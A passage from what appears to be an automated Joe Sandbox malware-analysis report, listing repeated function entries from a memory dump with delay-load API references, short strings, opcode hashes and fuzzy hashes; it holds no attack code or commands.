|, xrefs: 007CE1DD

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: |
API String ID: 1269201914-3293899293
Opcode ID: 36aee09ac6516b3251449004eb5d2b2b5acb02d608b68e24232dc8971afadff3
Instruction ID: f0fb65dd53a51279bada21945eb51f58bad028bd1fe7fef0eed51c64d4782239
Opcode Fuzzy Hash: 36aee09ac6516b3251449004eb5d2b2b5acb02d608b68e24232dc8971afadff3
Instruction Fuzzy Hash: FBB012D535A180FE314552461C06E37134CC6C5B10330813EFC06C0180D8487E990831

Function 007CEAE7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007CEAF9

Part of subcall function 007CE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007CE8D0
Part of subcall function 007CE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007CE8E1

Strings

3Qo, xrefs: 007CEAE7, 007CEAF3

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 3Qo
API String ID: 1269201914-1944013411
Opcode ID: 7dc41af66285941fab8b0cfd449fa7fb89c62a32861065713bcad3fe60deb4c9
Instruction ID: 7c66cc180a82be0fbc849c7c1b6bd3c4ff499896d574fc983ae66c265d728a79
Opcode Fuzzy Hash: 7dc41af66285941fab8b0cfd449fa7fb89c62a32861065713bcad3fe60deb4c9
Instruction Fuzzy Hash: 69B012CF29B882BC310462421D06D3B034CD4C4B90330D02FF500D4081DC884C860431

Function 007CE282 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007CE1E3

Part of subcall function 007CE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007CE8D0
Part of subcall function 007CE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007CE8E1

Strings

|, xrefs: 007CE1DD

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: |
API String ID: 1269201914-3293899293
Opcode ID: 692de25a37df59004aa86dc21e8e13e43f8d9d293516cae2d6fb93e4f0c29037
Instruction ID: 45c3b80e89756b2722ffe2b58111f06156dbdb543f282a1cc1d3fd45a1732d5b
Opcode Fuzzy Hash: 692de25a37df59004aa86dc21e8e13e43f8d9d293516cae2d6fb93e4f0c29037
Instruction Fuzzy Hash: 93B012E529A040FD310551461D06E3713DCC5C4B10330403EF809D0080EC487F560831

Function 007CE546 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007CE51F

Part of subcall function 007CE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007CE8D0
Part of subcall function 007CE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007CE8E1

Strings

PDGu<|, xrefs: 007CE519, 007CE546

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: PDGu<|
API String ID: 1269201914-3487047276
Opcode ID: 14f78cd67902c8f5f7e7aaf16a9f01b220458aafaad1c470716da98413303cfb
Instruction ID: 5645dfe6646118912e0df4849d697995a23438353822e9c9b4f0eae4745ff855
Opcode Fuzzy Hash: 14f78cd67902c8f5f7e7aaf16a9f01b220458aafaad1c470716da98413303cfb
Instruction Fuzzy Hash: B0B012C525AA40BC320452496C07E3F179CC4C9F10330522EF404C0080E8480D890431

Function 007CE50D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007CE51F

Part of subcall function 007CE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007CE8D0
Part of subcall function 007CE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007CE8E1

Strings

PDGu<|, xrefs: 007CE519

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: PDGu<|
API String ID: 1269201914-3487047276
Opcode ID: 709b206caa0d6e2eecb2aeabc0c116e0e5163f24b9f4fe2204f5edf4bd398a68
Instruction ID: 2ac1e4938bfaf6ae75c2c9546939bca9a483d5b33b20017b7136f10cdf7565c0
Opcode Fuzzy Hash: 709b206caa0d6e2eecb2aeabc0c116e0e5163f24b9f4fe2204f5edf4bd398a68
Instruction Fuzzy Hash: 07B012C525A940BC310452652C0AE3F135CD4C5F10330503EF414C0481E8480D490431

Function 007CE27D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007CE1E3

Part of subcall function 007CE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007CE8D0
Part of subcall function 007CE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007CE8E1

Strings

|, xrefs: 007CE1DD

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: |
API String ID: 1269201914-3293899293
Opcode ID: 24036d1ff3bc3a50e860d92a40408c7ca27a3652e0ebfe466f78c4a3106609fd
Instruction ID: d994c5e564935fd4c4898571da509112b65b40261eb14cb671dd7c83f1740905
Opcode Fuzzy Hash: 24036d1ff3bc3a50e860d92a40408c7ca27a3652e0ebfe466f78c4a3106609fd
Instruction Fuzzy Hash: DDA001EA2AA586FD310A62526D0AE3B135DC5C9B61334992EF816C4481A8987A661871

Function 007CE25F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007CE1E3

Part of subcall function 007CE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007CE8D0
Part of subcall function 007CE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007CE8E1

Strings

|, xrefs: 007CE1DD

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: |
API String ID: 1269201914-3293899293
Opcode ID: 1b1adf56dd7173d115952ff1f456e12b118307e4490b23f60bbbe6e039277cc3
Instruction ID: d994c5e564935fd4c4898571da509112b65b40261eb14cb671dd7c83f1740905
Opcode Fuzzy Hash: 1b1adf56dd7173d115952ff1f456e12b118307e4490b23f60bbbe6e039277cc3
Instruction Fuzzy Hash: DDA001EA2AA586FD310A62526D0AE3B135DC5C9B61334992EF816C4481A8987A661871

Function 007CE219 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007CE1E3

Part of subcall function 007CE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007CE8D0
Part of subcall function 007CE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007CE8E1

Strings

|, xrefs: 007CE1DD

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: |
API String ID: 1269201914-3293899293
Opcode ID: 048f2c7087a1abba4813628594b7ad3e96fb36363e5cc79437bde9ecc27e68bf
Instruction ID: d994c5e564935fd4c4898571da509112b65b40261eb14cb671dd7c83f1740905
Opcode Fuzzy Hash: 048f2c7087a1abba4813628594b7ad3e96fb36363e5cc79437bde9ecc27e68bf
Instruction Fuzzy Hash: DDA001EA2AA586FD310A62526D0AE3B135DC5C9B61334992EF816C4481A8987A661871

Function 007CE2D7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007CE1E3

Part of subcall function 007CE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007CE8D0
Part of subcall function 007CE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007CE8E1

Strings

|, xrefs: 007CE1DD

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: |
API String ID: 1269201914-3293899293
Opcode ID: bc59972cb016b1151dbc4084307e7f22a9507d199d943980a77028b9a9ce8281
Instruction ID: d994c5e564935fd4c4898571da509112b65b40261eb14cb671dd7c83f1740905
Opcode Fuzzy Hash: bc59972cb016b1151dbc4084307e7f22a9507d199d943980a77028b9a9ce8281
Instruction Fuzzy Hash: DDA001EA2AA586FD310A62526D0AE3B135DC5C9B61334992EF816C4481A8987A661871

Function 007CE2CD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007CE1E3

Part of subcall function 007CE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007CE8D0
Part of subcall function 007CE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007CE8E1

Strings

|, xrefs: 007CE1DD

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: |
API String ID: 1269201914-3293899293
Opcode ID: 71a3f23ceb700693626697f60985c05de059636ddd846b9677a3a489f98cd255
Instruction ID: d994c5e564935fd4c4898571da509112b65b40261eb14cb671dd7c83f1740905
Opcode Fuzzy Hash: 71a3f23ceb700693626697f60985c05de059636ddd846b9677a3a489f98cd255
Instruction Fuzzy Hash: DDA001EA2AA586FD310A62526D0AE3B135DC5C9B61334992EF816C4481A8987A661871

Function 007CE2C3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007CE1E3

Part of subcall function 007CE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007CE8D0
Part of subcall function 007CE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007CE8E1

Strings

|, xrefs: 007CE1DD

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: |
API String ID: 1269201914-3293899293
Opcode ID: 712afd9947ef9298b49433233b2b622ad258814b9f09799ab1a8aa5a5bf8600d
Instruction ID: d994c5e564935fd4c4898571da509112b65b40261eb14cb671dd7c83f1740905
Opcode Fuzzy Hash: 712afd9947ef9298b49433233b2b622ad258814b9f09799ab1a8aa5a5bf8600d
Instruction Fuzzy Hash: DDA001EA2AA586FD310A62526D0AE3B135DC5C9B61334992EF816C4481A8987A661871

Function 007CE2B9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007CE1E3

Part of subcall function 007CE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007CE8D0
Part of subcall function 007CE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007CE8E1

Strings

|, xrefs: 007CE1DD

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: |
API String ID: 1269201914-3293899293
Opcode ID: 63f82fdfeed20789d1f9527bdbd11c35943f006305b343d1668c0e5fa11f0ad2
Instruction ID: d994c5e564935fd4c4898571da509112b65b40261eb14cb671dd7c83f1740905
Opcode Fuzzy Hash: 63f82fdfeed20789d1f9527bdbd11c35943f006305b343d1668c0e5fa11f0ad2
Instruction Fuzzy Hash: DDA001EA2AA586FD310A62526D0AE3B135DC5C9B61334992EF816C4481A8987A661871

Function 007CE2AF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007CE1E3

Part of subcall function 007CE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007CE8D0
Part of subcall function 007CE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007CE8E1

Strings

|, xrefs: 007CE1DD

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: |
API String ID: 1269201914-3293899293
Opcode ID: 2488d664a928d71e0eca37c2ea2cb1830576a3d5cf741253b3c3840c380c4393
Instruction ID: d994c5e564935fd4c4898571da509112b65b40261eb14cb671dd7c83f1740905
Opcode Fuzzy Hash: 2488d664a928d71e0eca37c2ea2cb1830576a3d5cf741253b3c3840c380c4393
Instruction Fuzzy Hash: DDA001EA2AA586FD310A62526D0AE3B135DC5C9B61334992EF816C4481A8987A661871

Function 007CE2A5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007CE1E3

Part of subcall function 007CE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007CE8D0
Part of subcall function 007CE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007CE8E1

Strings

|, xrefs: 007CE1DD

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: |
API String ID: 1269201914-3293899293
Opcode ID: 5e8aeaa97a9d92b389c301284a307d47b92c9188fd1d251df700bb0f81810c13
Instruction ID: d994c5e564935fd4c4898571da509112b65b40261eb14cb671dd7c83f1740905
Opcode Fuzzy Hash: 5e8aeaa97a9d92b389c301284a307d47b92c9188fd1d251df700bb0f81810c13
Instruction Fuzzy Hash: DDA001EA2AA586FD310A62526D0AE3B135DC5C9B61334992EF816C4481A8987A661871

Function 007CE29B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007CE1E3

Part of subcall function 007CE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007CE8D0
Part of subcall function 007CE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007CE8E1

Strings

|, xrefs: 007CE1DD

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: |
API String ID: 1269201914-3293899293
Opcode ID: 7fc490487ad02becd836c5e79cd445e477ae582f76aa249b67825883b9792ae1
Instruction ID: d994c5e564935fd4c4898571da509112b65b40261eb14cb671dd7c83f1740905
Opcode Fuzzy Hash: 7fc490487ad02becd836c5e79cd445e477ae582f76aa249b67825883b9792ae1
Instruction Fuzzy Hash: DDA001EA2AA586FD310A62526D0AE3B135DC5C9B61334992EF816C4481A8987A661871

Function 007CE291 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007CE1E3

Part of subcall function 007CE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007CE8D0
Part of subcall function 007CE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007CE8E1

Strings

|, xrefs: 007CE1DD

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: |
API String ID: 1269201914-3293899293
Opcode ID: 8912b208f57a63fb281c2f9292ecce29281685870a253914f8de5d9f8de5d809
Instruction ID: d994c5e564935fd4c4898571da509112b65b40261eb14cb671dd7c83f1740905
Opcode Fuzzy Hash: 8912b208f57a63fb281c2f9292ecce29281685870a253914f8de5d9f8de5d809
Instruction Fuzzy Hash: DDA001EA2AA586FD310A62526D0AE3B135DC5C9B61334992EF816C4481A8987A661871

Function 007CE569 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007CE51F

Part of subcall function 007CE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007CE8D0
Part of subcall function 007CE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007CE8E1

Strings

PDGu<|, xrefs: 007CE519

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
